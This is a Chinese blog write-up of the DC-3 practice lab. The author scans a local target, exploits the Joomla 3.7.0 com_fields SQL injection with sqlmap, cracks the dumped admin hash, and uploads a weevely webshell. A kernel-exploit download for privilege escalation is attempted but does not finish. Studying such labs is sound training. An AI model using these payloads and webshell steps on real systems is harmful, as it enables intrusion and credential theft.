Mamor's Blog
0%

DCchallenges3

发表于 分类于
本文字数: 13k 阅读时长 ≈ 12 分钟
  • 环境

网段 192.168.18.0/24

kali 192.168.18.131

靶机 192.168.18.134

nmap扫描网段

kali@kali2020:~$ sudo nmap 192.168.18.0/24 -sn Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 11:09 CST Nmap scan report for 192.168.18.2 Host is up (0.00010s latency). MAC Address: 00:50:56:E0:DA:9A (VMware) Nmap scan report for 192.168.18.134 Host is up (0.00055s latency). MAC Address: 00:0C:29:83:96:86 (VMware) Nmap scan report for 192.168.18.254 Host is up (0.00033s latency). MAC Address: 00:50:56:E1:37:77 (VMware) Nmap scan report for 192.168.18.131 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.01 seconds

扫描靶机开放端口

kali@kali2020:~$ sudo nmap 192.168.18.134 -p- -sV Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 11:11 CST Nmap scan report for 192.168.18.134 Host is up (0.0014s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 00:0C:29:83:96:86 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.22 seconds

只开放了80端口

dirsearch扫一下目录

kali@kali2020:~/Tools/dirsearch$ sudo python3 dirsearch.py -u 192.168.18.134:80


扫到了管理员登录页面

http://192.168.18.134/administrator/

打开主页有说明

Welcome to DC-3.

This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge. :-)

这次只有一个flag相应得到flag就要得到root权限

访问administrator页面,可以看到是Joomla搭建的平台

在网上搜了下发现有一款JoomScan,安装sudo git clone https://github.com/rezasp/joomscan.git

perl joomscan.pl -u 192.168.18.134

[+] FireWall Detector [++] Firewall not detected

[+] Detecting Joomla Version [++] Joomla 3.7.0

[+] Core Joomla Vulnerability [++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.18.134/administrator/components
http://192.168.18.134/administrator/modules
http://192.168.18.134/administrator/templates
http://192.168.18.134/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.18.134/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

Your Report : reports/192.168.18.134/

发现Joomal版本为3.7.0

网上搜索相关漏洞发现存在SQL注入


kali@kali2020:~/Tools$ sudo searchsploit joomla 3.7.0

Exploit Title | Path

Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripti | php/webapps/43488.txt

Shellcodes: No Results

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

#Exploit Title: Joomla 3.7.0 - Sql Injection

#Date: 05-19-2017

#Exploit Author: Mateus Lino

#Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

#Vendor Homepage: https://www.joomla.org/

#Version: = 3.7.0

#Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux

#CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (DUAL) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SEL


给出了存在sql注入的url

http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

sqlmap注入命令

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

存在的sql注入类型

1
2
3
4
5
6
7
8
9
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END) 
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)  
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SEL

sqlmap -u "http://192.168.18.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch --dbs -p list[fullordering]

得到数据库

available databases [5]: [*] information_schema [*] joomladb [*] mysql [*] performance_schema [*] sys

查表名

sqlmap -u "http://192.168.18.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch -D joomladb --tables -p list[fullordering]

Database: joomladb [76 tables] +---------------------+ | #__assets | | #__associations | | #__banner_clients | | #__banner_tracks | | #__banners | | #__bsms_admin | | #__bsms_books | | #__bsms_comments | | #__bsms_locations | | #__bsms_mediafiles | | #__bsms_message_typ | | #__bsms_podcast | | #__bsms_series | | #__bsms_servers | | #__bsms_studies | | #__bsms_studytopics | | #__bsms_teachers | | #__bsms_templatecod | | #__bsms_templates | | #__bsms_timeset | | #__bsms_topics | | #__bsms_update | | #__categories | | #__contact_details | | #__content_frontpag | | #__content_rating | | #__content_types | | #__content | | #__contentitem_tag_ | | #__core_log_searche | | #__extensions | | #__fields_categorie | | #__fields_groups | | #__fields_values | | #__fields | | #__finder_filters | | #__finder_links_ter | | #__finder_links | | #__finder_taxonomy_ | | #__finder_taxonomy | | #__finder_terms_com | | #__finder_terms | | #__finder_tokens_ag | | #__finder_tokens | | #__finder_types | | #__jbsbackup_timese | | #__jbspodcast_times | | #__languages | | #__menu_types | | #__menu | | #__messages_cfg | | #__messages | | #__modules_menu | | #__modules | | #__newsfeeds | | #__overrider | | #__postinstall_mess | | #__redirect_links | | #__schemas | | #__session | | #__tags | | #__template_styles | | #__ucm_base | | #__ucm_content | | #__ucm_history | | #__update_sites_ext | | #__update_sites | | #__updates | | #__user_keys | | #__user_notes | | #__user_profiles | | #__user_usergroup_m | | #__usergroups | | #__users | | #__utf8_conversion | | #__viewlevels | +---------------------+

查字段 sqlmap -u "http://192.168.18.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" --columns

Database: joomladb Table: #__users [6 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | email | non-numeric | | id | numeric | | name | non-numeric | | params | non-numeric | | password | non-numeric | | username | non-numeric | +----------+-------------+


sqlmap -u "http://192.168.18.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "username,password" --dump -p list[fullordering]

Database: joomladb Table: #__users [1 entry] +----------+--------------------------------------------------------------+ | username | password | +----------+--------------------------------------------------------------+ | admin | $2y\(10\)DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | +----------+--------------------------------------------------------------+


把密码存储起来使用John爆破


vim dc3password_hash.txt

kali@kali2020:~/Tools$ cat dc3password_hash.txt $2y\(10\)DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu kali@kali2020:~/Tools$ sudo john dc3password_hash.txt -show ?:snoopy

得到密码为snoopy

去登录后台(admin,snoopy),成功登录

寻找可以上传shell的位置

使用kali上自带的weevely(一款webshell管理工具)

kali@kali2020:~$ weevely generate pass shell.php

Generated 'shell.php' with password 'pass' of 761 byte size.

kali@kali2020:~$ cat shell.php

将shell.php上传后进行连接

kali@kali2020:~$ weevely http://192.168.18.134/templates/beez3/shell.php pass

[+] weevely 4.0.1

[+] Target: 192.168.18.134 [+] Session: /home/kali/.weevely/sessions/192.168.18.134/shell_1.session

[+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information.

weevely> shell sh: 1: shell: not found www-data@DC-3:/var/www/html/templates/beez3 $ whoami www-data www-data@DC-3:/var/www/html/templates/beez3 $


想办法提权

查看靶机版本,发现为ubunutu16.04 内核版本为4.4.0-21

www-data@DC-3:/var/www/html $ uname -a Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux www-data@DC-3:/var/www/html $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04 LTS Release: 16.04 Codename: xenial

去漏洞库找下

kali@kali2020:~/Tools$ searchsploit -w ubuntu 16.04 4.4.0-21

Exploit Title | URL

Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | https://www.exploit-db.com/exploits/43234 Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-B | https://www.exploit-db.com/exploits/40049 Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race | https://www.exploit-db.com/exploits/47170 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | https://www.exploit-db.com/exploits/45010 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | https://www.exploit-db.com/exploits/44298 Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local | https://www.exploit-db.com/exploits/44300 Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege E | https://www.exploit-db.com/exploits/43418 Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) | https://www.exploit-db.com/exploits/47169 Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege E | https://www.exploit-db.com/exploits/41760

Shellcodes: No Results



www-data@DC-3:/var/www $ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip --2021-05-01 23:52:54-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip Resolving github.com (github.com)... 13.250.177.223 Connecting to github.com (github.com)|13.250.177.223|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following] --2021-05-01 23:52:55-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip Resolving raw.githubusercontent.com (raw.githubusercontent.com)... ::1, 127.0.0.1 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|::1|:443... failed: Connection refused. Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|127.0.0.1|:443... failed: Connection refused. www-data@DC-3:/var/www $ ls html www-data@DC-3:/var/www $ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

--2021-05-01 23:53:39-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip Resolving github.com (github.com)... 13.250.177.223 Connecting to github.com (github.com)|13.250.177.223|:443... connected. HTTP request sent, awaiting response... No data received. Retrying.

--2021-05-01 23:53:56-- (try: 2) https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip Connecting to github.com (github.com)|13.250.177.223|:443... failed: Connection refused. Resolving github.com (github.com)... 13.229.188.59 Connecting to github.com (github.com)|13.229.188.59|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following] --2021-05-01 23:54:18-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip Resolving raw.githubusercontent.com (raw.githubusercontent.com)... ::1, 127.0.0.1 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|::1|:443... failed: Connection refused. Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|127.0.0.1|:443... failed: Connection refused.

下载超时,尝试在kali先下载在让靶机在kiali上下载,最近VM虚拟机代理不管用了还在排查...







总结

  • namp扫网段和靶机开放端口

  • dirsearch扫描目录

  • 信息搜集(Joomal)

  • Joomscan扫描版本

  • searchsploit 查找joomal漏洞

  • sqlmap跑后台账号密码(密码被hash)

  • john破解hash密码

  • 登录后台,找上传shell的地方

  • 使用weevely生产一句话weevely generate <password> b.php

  • 使用weevely连接weevely <URL> <password>

weevely使用(webshell) https://blog.csdn.net/qq_26090065/article/details/81235120

  • 提权(未完成)

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------